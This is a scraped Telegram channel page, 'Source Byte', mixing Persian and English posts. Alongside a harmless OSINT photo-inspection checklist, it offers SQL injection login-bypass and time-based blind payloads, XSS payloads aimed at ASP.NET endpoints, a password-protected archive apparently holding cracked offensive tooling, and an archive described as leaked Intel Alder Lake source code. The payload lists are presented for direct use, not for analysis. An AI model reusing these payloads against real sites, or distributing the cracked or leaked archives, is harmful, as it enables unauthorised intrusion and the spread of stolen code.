Source Byte – Telegram
Source Byte
7.77K subscribers
848 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
یک متخصص #اوسینت یا کارگاه وب وقتی به یک عکس یا ویدئو برخورد می کند برای رسیدن به سر نخ ها این موارد را بررسی می کند:

Original Photo taken from Camera?
is copyrighted?
Has authoring Information?
Contains comments / denoscriptions?
Contains tracking?
Contains faces?
Contains text?
Contains location detalls?
Contains steganography?
Contains digital watermarks?
Contains date/time details?
Has maker note content?
Contains camera device Information?
Has thumbnail(s)?
Contains unreadable metadata?
Traling data appended to photo?
Contains metadata?
👍3👏2🤔1
Login Bypass 🌵

#SQLi

param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#

Part 1🥶
👏41
Pass : Pwn3rzs
CS47BLF.zip
64.4 MB
1
Source Byte
Login Bypass 🌵 #SQLi param=' param=" param=' or 1=1 param=' or 1=0 param=' and 1=1 ' or sleep(2) and 1=1# ' or sleep(2)# admin' and sleep(2)# ' union select sleep(2),null# ' union select sleep(2),null,null,null,null# Part 1🥶
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1

This is the most classic, standard first test:

' or '1'='1

Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '

Part 2 🥶
JSON Crack is a tool that generates graph diagrams from JSON objects


https://github.com/AykutSarac/jsoncrack.com
2
AlderLake_part_1.7z
1.5 GB
The source code of Intel Alder Lake processors has appeared on the web.

Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.



کد منبع پردازنده های Intel Alder Lake .

اینتل تایید کرده است که برخی از کد منبع و اسناد داخلی Alder Lake به بیرون درز کرده است و اعلام کرده است که داده های این نشت که در منابع عمومی منتشر شده است، واقعی است.
2
Forwarded from مگاهرتز
This media is not supported in your browser
VIEW IN TELEGRAM
حباب اطلاعاتی چیست؟
چگونه می‌توان از آن خارج شد؟
منبع: dw_persian
2
🥶Add to your SQL injection payload list 🥶

1%27//%256fR//50%2521%253D22%253B%2523  
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
🔥3
XSS payloads for http://ASP.NET endpoints:

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/